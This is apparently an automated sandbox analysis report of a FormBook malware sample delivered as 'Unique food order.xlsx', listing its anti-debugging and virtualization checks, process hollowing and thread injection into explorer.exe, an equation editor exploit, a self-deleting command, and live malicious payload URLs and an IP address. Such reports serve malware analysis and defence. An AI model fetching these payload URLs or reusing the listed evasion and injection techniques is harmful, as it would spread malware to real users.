Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File opened / queried: IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031044B rdtsc 4_2_0031044B
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031044B rdtsc 4_2_0031044B
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2376 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2376 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3008 Thread sleep time: -420000s >= -30000s Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2376 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2376 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3008 Thread sleep time: -420000s >= -30000s Jump to behavior
Source: explorer.exe, 00000007.00000002.2382028961.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.2337992936.0000000004263000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: explorer.exe, 00000007.00000000.2337947660.00000000041DB000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: explorer.exe, 00000007.00000000.2332515395.0000000000231000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: explorer.exe, 00000007.00000002.2382028961.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.2337992936.0000000004263000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: explorer.exe, 00000007.00000000.2337947660.00000000041DB000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: explorer.exe, 00000007.00000000.2332515395.0000000000231000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to hide a thread from the debugger
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031044B NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,00000000 4_2_0031044B
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031044B NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,00000000 4_2_0031044B
Hides threads from debuggers
Source: C:\Users\Public\vbc.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\Public\vbc.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\Public\vbc.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\Public\vbc.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\Public\vbc.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\Public\vbc.exe Thread information set: HideFromDebugger Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process queried: DebugPort Jump to behavior
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031044B rdtsc 4_2_0031044B
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031044B rdtsc 4_2_0031044B
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00312F56 LdrInitializeThunk, 4_2_00312F56
Source: C:\Users\Public\vbc.exe Code function: 4_2_00312F56 LdrInitializeThunk, 4_2_00312F56
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 4_2_003154F4 mov eax, dword ptr fs:[00000030h] 4_2_003154F4
Source: C:\Users\Public\vbc.exe Code function: 4_2_00311C16 mov eax, dword ptr fs:[00000030h] 4_2_00311C16
Source: C:\Users\Public\vbc.exe Code function: 4_2_00314802 mov eax, dword ptr fs:[00000030h] 4_2_00314802
Source: C:\Users\Public\vbc.exe Code function: 4_2_00314CBB mov eax, dword ptr fs:[00000030h] 4_2_00314CBB
Source: C:\Users\Public\vbc.exe Code function: 4_2_00315531 mov eax, dword ptr fs:[00000030h] 4_2_00315531
Source: C:\Users\Public\vbc.exe Code function: 4_2_003129C8 mov eax, dword ptr fs:[00000030h] 4_2_003129C8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00311E09 mov eax, dword ptr fs:[00000030h] 4_2_00311E09
Source: C:\Users\Public\vbc.exe Code function: 4_2_00311721 mov eax, dword ptr fs:[00000030h] 4_2_00311721
Source: C:\Users\Public\vbc.exe Code function: 4_2_003154F4 mov eax, dword ptr fs:[00000030h] 4_2_003154F4
Source: C:\Users\Public\vbc.exe Code function: 4_2_00311C16 mov eax, dword ptr fs:[00000030h] 4_2_00311C16
Source: C:\Users\Public\vbc.exe Code function: 4_2_00314802 mov eax, dword ptr fs:[00000030h] 4_2_00314802
Source: C:\Users\Public\vbc.exe Code function: 4_2_00314CBB mov eax, dword ptr fs:[00000030h] 4_2_00314CBB
Source: C:\Users\Public\vbc.exe Code function: 4_2_00315531 mov eax, dword ptr fs:[00000030h] 4_2_00315531
Source: C:\Users\Public\vbc.exe Code function: 4_2_003129C8 mov eax, dword ptr fs:[00000030h] 4_2_003129C8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00311E09 mov eax, dword ptr fs:[00000030h] 4_2_00311E09
Source: C:\Users\Public\vbc.exe Code function: 4_2_00311721 mov eax, dword ptr fs:[00000030h] 4_2_00311721
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9A26F8 mov eax, dword ptr fs:[00000030h] 5_2_1E9A26F8
Source: C:\Users\Public\vbc.exe Code function: 5_2_001B4802 mov eax, dword ptr fs:[00000030h] 5_2_001B4802
Source: C:\Users\Public\vbc.exe Code function: 5_2_001B29C2 mov eax, dword ptr fs:[00000030h] 5_2_001B29C2
Source: C:\Users\Public\vbc.exe Code function: 5_2_001B5435 mov eax, dword ptr fs:[00000030h] 5_2_001B5435
Source: C:\Users\Public\vbc.exe Code function: 5_2_001B5449 mov eax, dword ptr fs:[00000030h] 5_2_001B5449
Source: C:\Users\Public\vbc.exe Code function: 5_2_001B5472 mov eax, dword ptr fs:[00000030h] 5_2_001B5472
Source: C:\Users\Public\vbc.exe Code function: 5_2_001B548D mov eax, dword ptr fs:[00000030h] 5_2_001B548D
Source: C:\Users\Public\vbc.exe Code function: 5_2_001B4CBB mov eax, dword ptr fs:[00000030h] 5_2_001B4CBB
Source: C:\Users\Public\vbc.exe Code function: 5_2_001B54B9 mov eax, dword ptr fs:[00000030h] 5_2_001B54B9
Source: C:\Users\Public\vbc.exe Code function: 5_2_001B5531 mov eax, dword ptr fs:[00000030h] 5_2_001B5531
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020C26F8 mov eax, dword ptr fs:[00000030h] 9_2_020C26F8
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1388 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1388 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: 960000 Jump to behavior
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: 960000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: explorer.exe, 00000007.00000002.2382289744.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000007.00000002.2382289744.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000002.2382028961.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000002.2382289744.00000000006F0000.00000002.00000001.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000007.00000002.2382289744.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000007.00000002.2382289744.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000002.2382028961.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000002.2382289744.00000000006F0000.00000002.00000001.sdmp Binary or memory string: !Progman

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY
Yara detected Generic Dropper
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 320235 Sample: Unique food order.xlsx Startdate: 19/11/2020 Architecture: WINDOWS Score: 100 48 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 Antivirus detection for URL or domain 2->52 54 14 other signatures 2->54 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 37 16 2->15         started        process3 dnsIp4 38 wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu 103.125.191.5, 49165, 49166, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 10->38 32 C:\Users\user\AppData\...\svchost[1].exe, PE32 10->32 dropped 34 C:\Users\Public\vbc.exe, PE32 10->34 dropped 66 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->66 17 vbc.exe 10->17         started        36 C:\Users\user\...\~$Unique food order.xlsx, data 15->36 dropped file5 signatures6 process7 signatures8 40 Detected RDTSC dummy instruction sequence (likely for instruction hammering) 17->40 42 Tries to detect Any.run 17->42 44 Tries to detect virtualization through RDTSC time measurements 17->44 46 2 other signatures 17->46 20 vbc.exe 9 17->20         started        process9 signatures10 56 Modifies the context of a thread in another process (thread injection) 20->56 58 Tries to detect Any.run 20->58 60 Maps a DLL or memory area into another process 20->60 62 3 other signatures 20->62 23 explorer.exe 20->23 injected process11 process12 25 NAPSTAT.EXE 23->25         started        28 autoconv.exe 23->28         started        signatures13 64 Tries to detect virtualization through RDTSC time measurements 25->64 30 cmd.exe 25->30         started        process14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
103.125.191.5
 unknown Viet Nam
135905 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN true

Contacted Domains

Name IP Active
wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu 103.125.191.5 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu/worksdoc/svchost.exe true
  • 1%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://103.125.191.5/bin_xMjelaYnr43.bin true
  • Avira URL Cloud: safe
 unknown